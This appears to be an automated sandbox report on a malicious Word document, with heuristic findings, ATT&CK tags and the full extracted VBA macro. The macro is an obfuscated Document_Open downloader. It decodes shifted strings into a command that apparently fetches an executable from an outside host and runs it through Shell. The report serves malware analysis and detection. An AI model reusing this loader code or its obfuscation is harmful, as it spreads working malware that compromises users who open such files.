MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample is a Microsoft Office document containing heavily obfuscated VBA macros. The 'Document_Open' macro is present and configured to execute code, indicated by critical heuristic firings for 'Potential Shell call in VBA' and 'Obfuscated auto-exec VBA loader'. The presence of 'macros.bas' and the ClamAV detection name 'Doc.Malware.Chronos-6897935-0' further support its malicious nature. The script's obfuscation and use of `Shell` indicate it's likely a downloader for a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
ElseIf GkLj = 3360 Then Shell (StrReverse(StrReverse(GXbK))), 0 axPeyx = StrReverse("pwzrDoeuZzscmIyllS") -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
ElseIf GkLj = 3360 Then Shell (StrReverse(StrReverse(GXbK))), 0 axPeyx = StrReverse("pwzrDoeuZzscmIyllS") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() drScMeM = Replace("OykHXkkdeoisLKcVh", "OykH", "CIGL") -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21691 bytes |
SHA-256: 12a33bf1eb375370f5c4c625626c050b50e3ac910e32d438d93e11a4950a8e25 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
395 of 511 identifiers look randomly generated (e.g. 'XPodevrgSkEYlIBGAaSRPsqG') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
drScMeM = Replace("OykHXkkdeoisLKcVh", "OykH", "CIGL")
Do While UebuY < 97
tMuv = Replace("TQwuXwziFsYZCFIiGuW", "TQw", "QSYR")
tMuv = Replace("dXQvOxTfkWOLApHpQiK", "dXQv", "FjGOt")
tMuv = Replace("BJwnnuzhUX", "BJw", "oALU")
tMuv = StrReverse("ORMkjOgBCrkKj")
tMuv = StrReverse("ZOBESfHEgTC")
tMuv = "wlLcGCGrKc"
tMuv = "YMRYQeyO"
tMuv = "esphHjpwcPms"
tMuv = "rkOCcAJO"
tMuv = "aeIqQxzCf"
tMuv = Replace("VOrhmmLpUcZx", "VOrh", "yXGj")
tMuv = StrReverse("rBhwzLmcDdmJjCy")
tMuv = Replace("fmRUfSplYQ", "fmRU", "MvDFnQH")
tMuv = Replace("LVIHpnIGsuSbKPzDq", "LVI", "IUXwRT")
tMuv = StrReverse("EFQxgYOpmIwofdYlo")
tMuv = StrReverse("WgfpRmblgdvJH")
tMuv = Replace("aOiiVWeEWRdR", "aOi", "wzIzwnE")
tMuv = StrReverse("crYsDLGSFlOhttCdR")
tMuv = Replace("IOMzcXXTDw", "IOMz", "iTygfq")
tMuv = StrReverse("uaeOwYAiRWgKMR")
tMuv = Replace("TQaiVAwgCXPRlvx", "TQa", "KmSek")
tMuv = "qQabVL"
tMuv = "PszGRlGQ"
tMuv = Replace("nQrAjGwwaZkrZEUPF", "nQrA", "YMcI")
tMuv = Replace("xXrQzUogrVGFn", "xXr", "nOWRbo")
UebuY = UebuY + 1
Loop
For HhfRH = 0 To 293
Xjmy = "iIXBJcQ"
Xjmy = "dEealrsJn"
Xjmy = "vptxrQxGP"
Xjmy = StrReverse("uWXPtfPYgzYpVMx")
Xjmy = StrReverse("TOYTtydfaSfE")
Xjmy = StrReverse("rILTEOzgWVvKIg")
Xjmy = StrReverse("shhDcFZBblnJb")
Xjmy = Replace("AqjVPfPhoVTyTsq", "Aqj", "uDjG")
Xjmy = Replace("cbPqhLFYdnrzAR", "cbP", "JeSGsu")
Xjmy = StrReverse("qRbvatofFTTnBem")
Xjmy = "rHvLzguM"
Xjmy = "zAGLSyx"
Xjmy = Replace("DJwtlUZLfWTQCYZcV", "DJwt", "lEolj")
Xjmy = Replace("LGQmmGTbLHgcYanosWC", "LGQ", "KZtj")
Xjmy = Replace("sgflOZbgyTUJHU", "sgf", "azvr")
Xjmy = StrReverse("ZSAqYOHmjsv")
Xjmy = Replace("zcpAMVaruYJlqTwm", "zcp", "Mzxnr")
Xjmy = Replace("OiOvSIAAso", "OiOv", "YuklD")
Xjmy = Replace("iRfETiEZXvDy", "iRfE", "ZGxI")
Xjmy = "iDuwPX"
Xjmy = Replace("zFgoiKleSjwSXn", "zFgo", "YvfnKuJ")
Xjmy = StrReverse("JdOztISxnJUz")
Xjmy = Replace("nnEipLOlBcgD", "nnE", "WWOH")
Xjmy = "ILcDWBstL"
Xjmy = Replace("wRlFfEbxtlLs", "wRlF", "ctvkATL")
Next HhfRH
Do While DKMsA < 338
jtat = Replace("EWPnmOmOfskYi", "EWP", "bOzL")
jtat = StrReverse("KTjFqeMxgofozo")
jtat = StrReverse("yjlpPvFUZFypcj")
jtat = Replace("MbrJDgZWfeLqZ", "MbrJ", "QMtleW")
jtat = StrReverse("wifdQCSRFDkFcyDzXL")
jtat = StrReverse("HfiycAEBzJ")
jtat = Replace("aPgIspBorAqD", "aPg", "eWDvW")
jtat = StrReverse("cGvEUSUIQAK")
jtat = "CufVAvL"
jtat = "RQbxTJHZfvoRD"
jtat = Replace("YfwseYlBbxccCeXEHTO", "Yfws", "Tpah")
jtat = StrReverse("QvGJnqGfigxi")
jtat = StrReverse("ducHOraFjrrXGco")
jtat = StrReverse("GGbGxxdhsPzSrFszVH")
jtat = StrReverse("bImzTyHlua")
jtat = Replace("ftbaDbJXBuesnqfrmt", "ftba", "uDXmC")
jtat = "qglpEnAnEvA"
jtat = Replace("pWVFiqRrTsU", "pWVF", "rDVF")
jtat = Replace("pQMXjqQVyFJXOdI", "pQM", "CViynC")
jtat = "FourdJ"
jtat = Replace("gqlfptycnR", "gql", "iikqc")
jtat = StrReverse("qJGMyjfWaQuv")
jtat = StrReverse("cPhsUeEkhMwHpLSzDOQ")
jtat = Replace("XJJljBmCvKKODtlUPu", "XJJl", "DnYB")
jtat = StrReverse("fbixRKUBOMTQUoKdozh")
DKMsA = DKMsA + 1
Loop
mjrexq = StrReverse("ezOjTnonMoQzkmJpaH")
tDXAnH = StrReverse("trrUUUdXPzjxgzX")
kiikcuR = StrReverse("dTxbcMwLLvwVUw")
PvpqKoZ = Replace("mXREZqSwayqBfw", "mXRE", "lVDbvgn")
cWgEaKo = StrReverse("coFvrnVezvWFdcTJCD")
VuqreB = StrReverse("VlrAnBHCHhswyzacAJi")
Do While CXCXl < 139
VZhx = StrReverse("cKHbUuTqhwbx")
VZhx = Replace("IzhVFbeEasu", "Izh", "BePH")
VZhx = StrReverse("DzJkBTVOxlFSXYZTy")
VZhx = Replace("CotGTWslHO", "CotG", "RXcDr")
VZhx = "zqphJBzvIojlC"
VZhx = StrReverse("aQrnTcfdCrspIQ")
VZhx = "KWxQgwythig"
VZhx = "QDenFKroP"
VZhx = Replace("bguCVSCnGVDdmk", "bgu", "jyfR")
VZhx = "tdcQvwGt"
VZhx = StrReverse("FmPrbRKXMAJYiVzWUr")
VZhx = Replace("uBGTxdfmByka", "uBGT", "OccDR")
VZhx = StrReverse("bBzGISQXXriqMtQhOq")
VZhx = Replace("YSqEJZulIvMEhZpEVHm", "YSq", "JWAvw")
VZhx = Replace("krnchPcqzfC", "krnc", "fVeIIUE")
VZhx = Replace("ELYvKqjvuJvSFP", "ELY", "jvKHg")
VZhx = StrReverse("dpnbjKnZOZuTJh")
VZhx = Replace("JsWRhUCtcZDmlZIl", "JsW", "CEUj")
VZhx = StrReverse("AvDwsaQREp")
VZhx = Replace("ImJLuVRRIXMhZMhxOk", "ImJL", "tJWLi")
VZhx = StrReverse("hgvAohCZbTqdaEMOn")
VZhx = StrReverse("FPaQJhErnbMGwkQpo")
VZhx = "zABVrQxAJ"
VZhx = StrReverse("llOqsLPLZbzXPpqiX")
VZhx = Replace("PoFWXkOmLdfBlc", "PoF", "BmayfEB")
CXCXl = CXCXl + 1
Loop
While GkLj < 3386
If GkLj = 28 Then
TmiPY = TmiPY & lwdPKrR(-1, "YnNpVbRVtKccaOhvSro@xvT`TeiACiUoKHAdC`XPodevrgSkEYlIBGAaSRPsqG@`GUJtynVEAqHyWmqjY`HCIbJVBASYfYGw")
ElseIf GkLj = 2782 Then
yEmE = Replace("qFOpwhwPlX", "qFO", "QwVLS")
WqxZqJ = Replace("thLOonlmmJWsrBCO", "thLO", "ZbJC")
WqxZqJ = Replace("LmnMrWZUdZy", "Lmn", "HrBmQb")
ElseIf GkLj = 2316 Then
yEmE = Replace("pWGcuSDHlp", "pWG", "IzPOB")
pupoAW = StrReverse("dIMAnZuvcqxKEi")
pupoAW = StrReverse("FBmhrYjCuYcCx")
ElseIf GkLj = 378 Then
yEmE = Replace("FDbDQbeMnQ", "FDb", "KjLqd")
ZJojVw = "pbzpgtVwXZnAp"
ZJojVw = Replace("KFeVvUDYICoyymon", "KFeV", "BEZmCMw")
ElseIf GkLj = 521 Then
yEmE = Replace("mISJgDmAQs", "mIS", "BPqaa")
APLBKP = StrReverse("cJYxOmwwjKnQo")
APLBKP = Replace("IDReATDzDkvOKlt", "IDR", "wJwcQpY")
ElseIf GkLj = 2723 Then
yEmE = Replace("yvjxqItTTB", "yvj", "ifJPW")
YWAVTG = StrReverse("gfAtbsadoLz")
YWAVTG = Replace("xKhOjhUxKnJsYesvf", "xKh", "lryv")
ElseIf GkLj = 1042 Then
yEmE = Replace("sjXwGVtstH", "sjX", "fhbcv")
JRfcKp = StrReverse("XwDzFPudBG")
JRfcKp = "xsJOYnjWh"
ElseIf GkLj = 3209 Then
cEdO = Split(Replace(TmiPY, "ehOGp", "ttc"), Chr(121 + 3))(0)
Tfxzrw = StrReverse("lMTYetgWYeGK")
Tfxzrw = StrReverse("XRdQnnunBkYoBgpiahM")
ElseIf GkLj = 2211 Then
yEmE = Replace("wDleZeshcK", "wDl", "yGfrO")
tdXjym = Replace("oXCsWWbFlryPDXlRW", "oXCs", "rLhEiRo")
tdXjym = StrReverse("ogpMhLyBOc")
ElseIf GkLj = 284 Then
yEmE = Replace("DWECoOTcjg", "DWE", "pbfHG")
SfGhIM = Replace("jCQHITuRbZx", "jCQH", "RiuI")
SfGhIM = StrReverse("sJKEspQWbW")
ElseIf GkLj = 2895 Then
yEmE = Replace("LZHBljnHtZ", "LZH", "cLwpl")
UkhKwp = Replace("oSZwREiYsuvSoqtGRns", "oSZw", "ykFAL")
UkhKwp = Replace("LLaoDTkMWbumzMPCRY", "LLa", "dQYDyM")
ElseIf GkLj = 1800 Then
yEmE = Replace("cXlbllAyjW", "cXl", "HnnIO")
SrwgZP = Replace("VBrqwuwYqPgTzAi", "VBr", "ptCGY")
SrwgZP = Replace("KlcmPZBVuYmarFsL", "Klc", "zKIG")
ElseIf GkLj = 2052 Then
yEmE = Replace("dBOQFjuHCv", "dBO", "tnhIb")
IvvVjS = Replace("iwsnGuWxhzJGKqfI", "iwsn", "bYjUGtH")
IvvVjS = Replace("IdqgYAlbmeUIQvV", "Idqg", "cCrdmy")
ElseIf GkLj = 1645 Then
yEmE = Replace("vTtQObbaCI", "vTt", "frSRQ")
dsTksL = Replace("oeVkzWvlasOZvtkf", "oeV", "kznK")
dsTksL = StrReverse("WWsgeErSSQDHEbhdpp")
ElseIf GkLj = 1309 Then
yEmE = Replace("sJlidGizOc", "sJl", "ygCsg")
YKAZUD = Replace("hJSmhoOHXCe", "hJSm", "MxiYFm")
YKAZUD = StrReverse("QUrqyAgfrWzmRUXPhv")
ElseIf GkLj = 2603 Then
yEmE = Replace("edTapxDlbU", "edT", "txsHI")
QQazLG = "nyTXrRdPMJbH"
QQazLG = Replace("tRoKROQuypbZzeLyiBj", "tRo", "ntrUf")
ElseIf GkLj = 2876 Then
yEmE = Replace("PEScYSTRwr", "PES", "Bhxba")
POVqCV = StrReverse("UlffJEPXBoxjZVavwum")
POVqCV = Replace("vslksQYeuXKr", "vslk", "wMpl")
ElseIf GkLj = 678 Then
yEmE = Replace("vaEruJIkmx", "vaE", "mdcOE")
xlmHDX = StrReverse("IupAqrjcva")
xlmHDX = "wDugsZ"
ElseIf GkLj = 2833 Then
yEmE = Replace("RysCVxOuSz", "Rys", "LrgjW")
GDZUcQ = Replace("hlJkeFBCzZuQlBPSCK", "hlJ", "SYotc")
GDZUcQ = Replace("FiPtQGhnrQOOMeFrc", "FiPt", "UrmWIgO")
ElseIf GkLj = 1908 Then
yEmE = Replace("RZtfGTOkmp", "RZt", "YlIfH")
tkJrmz = Replace("fydqmfFWpREpehCI", "fydq", "byeqK")
tkJrmz = StrReverse("dwkPaGmWSzSZdy")
ElseIf GkLj = 1146 Then
yEmE = Replace("cXYcBWxRGK", "cXY", "GckHK")
uHTgyi = "EPYDXBFiLW"
uHTgyi = "MgtEPid"
ElseIf GkLj = 103 Then
TmiPY = TmiPY & lwdPKrR(-1, "dBij{:(&dwd-Xhfq[&*('gs`OoldSsdF99\gs`O-NH-ldsrxRZ' gs`odkhE, rrdbnqO,sq`sR 0 v, dwd-kkdgrqdvno:((")
AcFGSd = StrReverse("kkByviOSZMuy")
AcFGSd = Replace("lBbrZHKuGk", "lBbr", "rdwrpI")
ElseIf GkLj = 1764 Then
yEmE = Replace("ZksBQsVmsi", "Zks", "OdUsK")
GWdXzs = StrReverse("yWboPcokAfLwZ")
GWdXzs = "HcjvpFqryPrbG"
ElseIf GkLj = 260 Then
TmiPY = TmiPY & lwdPKrR(-1, "dkhEc`nkmvnC-(smdhkBadV-sdM-ldsrxR sbdiaN,vdM' 0 v, dwd-kkdgrqdvno{JByAm{pEal")
BdBScw = StrReverse("SDTvztGJVFCKusSam")
BdBScw = "jHWtVD"
ElseIf GkLj = 2166 Then
yEmE = Replace("DdLTKZyvMM", "DdL", "yhCny")
EhWMiT = Replace("ntdtSvcIRyEOO", "ntdt", "TDVuZ")
EhWMiT = "lXQwITaJCJ"
ElseIf GkLj = 3300 Then
GXbK = Replace(Twql, cEdO, Chr(44 + 2))
kbMqeD = Replace("bDyfkXrrlL", "bDyf", "OngYte")
kbMqeD = Replace("xmZEFlfPFdOv", "xmZ", "EkSFBFe")
ElseIf GkLj = 1458 Then
yEmE = Replace("seeQTqoaDT", "see", "ivewe")
YPFLKc = Replace("UrzoHxTMciRJzFAhU", "Urz", "ewSMj")
YPFLKc = StrReverse("IutWGFCynf")
ElseIf GkLj = 2410 Then
yEmE = Replace("VBCuRuwYOU", "VBC", "mMtIz")
ELvLsb = StrReverse("CnnQWKRRTQPdjmOo")
ELvLsb = Replace("ZKFPwryFys", "ZKF", "jqazy")
ElseIf GkLj = 758 Then
yEmE = Replace("FEeOabtaRP", "FEe", "pudys")
EFyTkm = Replace("YlsqFSDETKmPYGYwHQm", "Ylsq", "owCAjEV")
EFyTkm = Replace("UPloZOKKalx", "UPlo", "udAegI")
ElseIf GkLj = 957 Then
yEmE = Replace("IVAkFkXwzG", "IVA", "BAncE")
RxWXsO = StrReverse("lAftuOEdbXsbGfxruXb")
RxWXsO = StrReverse("DrfLfakHCpaCSMmKXVJ")
ElseIf GkLj = 619 Then
yEmE = Replace("LTwzGlwPpK", "LTw", "oBJah")
FeOSVb = StrReverse("aGHkgOzZJUMTYlKpOc")
FeOSVb = StrReverse("RfgobFGOZmlQUVlfmM")
ElseIf GkLj = 1016 Then
yEmE = Replace("PgltvJBtRd", "Pgl", "vEyxY")
YnhSRU = StrReverse("FbAStBiJziQnV")
YnhSRU = Replace("hSYoSLhXCRDXfE", "hSYo", "GRCbp")
ElseIf GkLj = 1374 Then
yEmE = Replace("iEfqigKOGm", "iEf", "yCDaU")
HRvwhX = Replace("KMTAOSMSpavjnidf", "KMTA", "PJqj")
HRvwhX = StrReverse("cvJlyZuIbR")
ElseIf GkLj = 1510 Then
yEmE = Replace("DfZucmbgAU", "DfZ", "fuVgn")
yOaejZ = "LGASWUyiqz"
yOaejZ = "exgePsB"
ElseIf GkLj = 1748 Then
yEmE = Replace("YurTitsmpi", "Yur", "pzKXb")
nviIgY = StrReverse("kVqbdbqkcRQxooyLh")
nviIgY = StrReverse("bMIWiRxXeprXKK")
ElseIf GkLj = 2696 Then
yEmE = Replace("EKzlDtPhyO", "EKz", "YgFtY")
tUUrUf = StrReverse("ndhhQsypIsxsnR")
tUUrUf = StrReverse("HsIsYdvUxiYBfWjE")
ElseIf GkLj = 474 Then
yEmE = Replace("ZdrGGUvEnl", "Zdr", "tpaYA")
woJJSD = Replace("hHRUorVRYJVJ", "hHR", "FyWB")
woJJSD = StrReverse("lFzMDJqBMYFk")
ElseIf GkLj = 1707 Then
yEmE = Replace("AZdrDGhqaX", "AZd", "CyDoc")
jxTstO = "GgqdaYkdvJPjI"
jxTstO = Replace("CAnRlZfqiCobLD", "CAnR", "CbnqmC")
ElseIf GkLj = 2111 Then
yEmE = Replace("hxXReWfUKd", "hxX", "GEznk")
mqJzcl = Replace("yRMVqTmFZQsfcmifCD", "yRMV", "Enfrr")
mqJzcl = Replace("mKcbJtaJyjA", "mKc", "WebkGWn")
ElseIf GkLj = 1563 Then
yEmE = Replace("RZOfGQCJRQ", "RZO", "Sxewo")
rkVEKz = StrReverse("ValenskeJX")
rkVEKz = StrReverse("JevrlaLhykbxUwW")
ElseIf GkLj = 849 Then
yEmE = Replace("CdbixcJzgQ", "Cdb", "CiKCU")
DynBjx = "aAEYMS"
DynBjx = StrReverse("RympRPXVDyJas")
ElseIf GkLj = 2976 Then
yEmE = Replace("RQTrnnkfym", "RQT", "bxZDv")
AiiJIb = StrReverse("vsafxHpQXXJ")
AiiJIb = StrReverse("WemSXJQrnEGOLfXXPIZ")
ElseIf GkLj = 1547 Then
yEmE = Replace("EHVEtVYnHd", "EHV", "MmBDJ")
nyQDIJ = StrReverse("THRqAGVALGKBRtio")
nyQDIJ = Replace("okvoUZFWxxdjwhGZHIc", "okv", "IxVY")
ElseIf GkLj = 3266 Then
Twql = Replace(dfFy, nBzCK, Chr(104) + Chr(116) + Chr(116) + Chr(112))
PhfaPq = StrReverse("cQFdjowPVjDJTx")
PhfaPq = Replace("AprzgqEZyIbIjxpZ", "Apr", "leuE")
ElseIf GkLj = 3065 Then
TmiPY = Replace(StrReverse(TmiPY), "AlBiT", "Phg")
YqVXnx = StrReverse("zWKaTyqWwQnzL")
YqVXnx = "nRukMzsRuguOp"
ElseIf GkLj = 3076 Then
dfFy = Split(Replace(TmiPY, "TBmBr", "vaI"), Chr(122 + 2))(3 - 1)
byWaSZ = Replace("CBGBWxHOwplr", "CBGB", "VCnLYr")
byWaSZ = Replace("nWXnSRJsKQhikPoirC", "nWX", "qJXxSve")
ElseIf GkLj = 1277 Then
yEmE = Replace("dbRWBYgWvB", "dbR", "vTRlz")
GpQoBa = "seAAEdHDST"
GpQoBa = Replace("BMDpruTqXAggTd", "BMDp", "oxbgD")
ElseIf GkLj = 1228 Then
yEmE = Replace("fZzcPTdqWk", "fZz", "WosmQ")
dTgqma = Replace("qClaHSoLnPzucLEmTFL", "qCla", "BUdt")
dTgqma = StrReverse("rXklGQbLzILCu")
ElseIf GkLj = 3360 Then
Shell (StrReverse(StrReverse(GXbK))), 0
axPeyx = StrReverse("pwzrDoeuZzscmIyllS")
axPeyx = Replace("vFodGTLzGqGgSKnR", "vFo", "Lapt")
ElseIf GkLj = 1978 Then
yEmE = Replace("FhdearJVts", "Fhd", "XVLri")
DJHtrv = StrReverse("rcULRZlAHS")
DJHtrv = StrReverse("iWGPKSTLhkj")
ElseIf GkLj = 1834 Then
yEmE = Replace("HXTyyTFBZj", "HXT", "CHylU")
kvoJjV = "Ceezkx"
kvoJjV = StrReverse("WBeQBUlslayYxg")
ElseIf GkLj = 2201 Then
yEmE = Replace("fuVTysudwE", "fuV", "JDwsT")
Ytufbk = "qpuIsmMDTpo"
Ytufbk = StrReverse("RCZKUynZQUtURAbgyk")
ElseIf GkLj = 1418 Then
yEmE = Replace("AMFWrLDJJJ", "AMF", "ubDtC")
ZVmVEB = StrReverse("omMXufmPSWHaVdSY")
ZVmVEB = Replace("cTQfmHWOKFK", "cTQf", "HIuP")
ElseIf GkLj = 2129 Then
yEmE = Replace("xBsDMWYtaZ", "xBs", "LZbjh")
KGvrEd = Replace("dieyMzvwojmCdjwBOW", "diey", "LukWTi")
KGvrEd = StrReverse("VgSoxQWAXqCoahnBVUJ")
ElseIf GkLj = 3122 Then
nBzCK = Split(Replace(TmiPY, "MsECy", "Gmg"), Chr(123 + 1))(3 - 2)
nGAZIP = Replace("eigqDDfVJJyRgUwJn", "eigq", "MApzVgZ")
nGAZIP = StrReverse("JhJbADEIWtzuLo")
ElseIf GkLj = 2508 Then
yEmE = Replace("lQliQnxVxB", "lQl", "swApQ")
bCYmeF = Replace("oUnFrXRGTRan", "oUnF", "RLYTI")
bCYmeF = StrReverse("fnJnPvCCAZcJjDfTtB")
ElseIf GkLj = 2944 Then
yEmE = Replace("qRfQIKfsoz", "qRf", "yivLU")
TprQso = StrReverse("hVHPWGglqsFr")
TprQso = "Pthkft"
ElseIf GkLj = 392 Then
yEmE = Replace("BqiGsmLPBg", "Bqi", "PoVve")
fMPcPe = Replace("bQXZplqRTxBhviHkkCI", "bQXZ", "UcIzSZ")
fMPcPe = Replace("tbZVBLZQQvGK", "tbZ", "AfAUXde")
ElseIf GkLj = 151 Then
TmiPY = TmiPY & lwdPKrR(-1, "&dwd-Xhfq[&*('gs`OoldSsdF99\gs`O-NH-ldsrxRZ'+&fmo-IVr2v.nh-jhmjds-t..9rossg&'")
twMHuK = StrReverse("JiYRktdPbeQsVBpd")
twMHuK = Replace("BDWpcVFqBLo", "BDW", "PcAMjUG")
ElseIf GkLj = 449 Then
yEmE = Replace("jGwLalzcrg", "jGw", "TbtSB")
FpVowv = "enhfbd"
FpVowv = StrReverse("yBiQBTfhXdVyFnsihSY")
ElseIf GkLj = 319 Then
yEmE = Replace("wnhiLIohjH", "wnh", "JeLfY")
ppuUrX = "LZGVxYxYStxTu"
ppuUrX = Replace("LIIxkaKrXMk", "LIIx", "wSDS")
End If
GkLj = GkLj + 1
Wend
For gtOjt = 0 To 360
CIoJ = StrReverse("JpPwXgZkjDmHEVZ")
CIoJ = "YiHAXnK"
CIoJ = StrReverse("dBmAHnwQitrad")
CIoJ = Replace("xIrusIjMxH", "xIr", "aVEGF")
CIoJ = "gQhXHLkU"
CIoJ = StrReverse("TFdXqDXQqzkQgQk")
CIoJ = Replace("wGlWTrHpICtrT", "wGlW", "UGWuiTp")
CIoJ = StrReverse("aIEeSZZabLHjABXl")
CIoJ = StrReverse("BqDXijJnpqoxVHrelZj")
CIoJ = Replace("jvdZlHkBSskwd", "jvdZ", "dmoHo")
CIoJ = "DcjdVa"
CIoJ = "ZxVaXIPouljn"
CIoJ = "EEmReMf"
CIoJ = "sLGeWpOGj"
CIoJ = Replace("lRVoIxKWoIU", "lRV", "PvLER")
CIoJ = Replace("yYlElbqSWYf", "yYl", "MSRMLS")
CIoJ = StrReverse("IohJwywgnFujt")
CIoJ = StrReverse("CDJBDYxrEWDlRRUUhYM")
CIoJ = StrReverse("YuOuunekhxrox")
CIoJ = Replace("qfCyweaBCfrDWZ", "qfC", "fdcoQQA")
CIoJ = Replace("HblkUSnviG", "Hbl", "OhdY")
CIoJ = "cJlZxzkkfsZpp"
CIoJ = Replace("bdZrkEiHrwR", "bdZr", "OJiSpf")
CIoJ = Replace("nUgyUbszaKSysJXGTKn", "nUgy", "KDOXqxn")
CIoJ = "kxkvMwmFet"
Next gtOjt
Do While yopSE < 391
ITjp = StrReverse("ptwyuETjfkUs")
ITjp = "OqYBuCsydtlu"
ITjp = Replace("BpDXLzCgoPXX", "BpDX", "XYTEH")
ITjp = Replace("LOcWMqfhyaOwgHlM", "LOc", "UEXtC")
ITjp = StrReverse("JVZHgsmFhyJH")
ITjp = StrReverse("LGviaOHiAwcrKxl")
ITjp = "bIfnXeLY"
ITjp = "qDoagpz"
ITjp = StrReverse("IrnMUlLAyn")
ITjp = "RTdkCPgrMR"
ITjp = StrReverse("SgrSMpEEtCZWDJoQCvV")
ITjp = Replace("lvfynmTqacnUOuL", "lvf", "LBnczg")
ITjp = "rIvytxxVFqtA"
ITjp = "PzErfcmCYO"
ITjp = "dYWkbdRocxF"
ITjp = StrReverse("wJXeeSTeUYVZyHcwInP")
ITjp = Replace("VofcMMxzzVxeiVzFr", "Vofc", "cTfR")
ITjp = StrReverse("lTfQkLnQujThujPQUEC")
ITjp = Replace("XwVPnLkDzoDl", "XwVP", "MKuue")
ITjp = Replace("aYYwkaVcEkADXyYgxEr", "aYYw", "sdTWYmi")
ITjp = Replace("pSquhBDyEYEsnQzfg", "pSqu", "Cituy")
ITjp = StrReverse("EywSTZhKFulcrxh")
ITjp = Replace("uBqRjMVaiyLvdAj", "uBq", "knZdGHL")
ITjp = "FsMEkDRvjERR"
ITjp = "WMgZlyGGTLLU"
yopSE = yopSE + 1
Loop
End Sub
Public Function lwdPKrR(sPfSW, jU) As String
Do While orOuB < 223
FWJu = StrReverse("kFJMgYItxlAcmABlQR")
FWJu = Replace("RWByHHlpayBAOqA", "RWBy", "zndtchi")
FWJu = Replace("botuzbrPHGMoUrYh", "bot", "XtVRygv")
FWJu = Replace("FnBBOZbwnV", "FnBB", "MDVy")
FWJu = Replace("USzWOesOxVgv", "USz", "akcsfsY")
FWJu = "isWeazS"
FWJu = "ueFERV"
FWJu = "EhapVsPbs"
FWJu = Replace("vxWfRddwinaVEaIl", "vxWf", "kIhb")
FWJu = Replace("cHKuYsQTtFWdR", "cHKu", "GIBR")
FWJu = StrReverse("okmyAbqDUVqnWfy")
FWJu = StrReverse("roExDkcitfiohQEhwj")
FWJu = Replace("slQlyQPXmDtwE", "slQl", "tBwDXJ")
FWJu = StrReverse("dmxYwSpTaxXGszlB")
FWJu = Replace("nUWLsScyeKxkGlxMPeI", "nUWL", "qWBXgj")
FWJu = "XRMdzKWltu"
FWJu = StrReverse("RtCpavzSmgPskjcT")
FWJu = StrReverse("IFlfmuGXKoZ")
FWJu = Replace("IEWrnAJEQUqJ", "IEWr", "FqdEIo")
FWJu = StrReverse("VqdbQCTWAjJvgI")
FWJu = Replace("URXitFmVpqSHqnJjIEs", "URXi", "vKury")
FWJu = StrReverse("pDIKUlBZdYHzX")
FWJu = StrReverse("ybuzaEIjqPoiguJJ")
FWJu = StrReverse("odnwleWJGaDTzQgH")
FWJu = Replace("jlTSccvObsxCZAC", "jlT", "IZok")
orOuB = orOuB + 1
Loop
Dim FbyM() As Byte
FbyM = StrConv(jU, vbFromUnicode)
While WaKr <= UBound(FbyM)
CmHWM = Replace("lmgSUmJAPV", "lmg", "lraWG")
CmHWM = Replace("mqXUTggwal", "mqX", "LzZcZ")
FbyM(WaKr) = FbyM(WaKr) - sPfSW
WaKr = WaKr + 1
CmHWM = Replace("HUqyzhlKIJ", "HUq", "EbecS")
CmHWM = Replace("iahoZSlEWE", "iah", "FqFgH")
Wend
lwdPKrR = StrConv(FbyM, vbUnicode)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.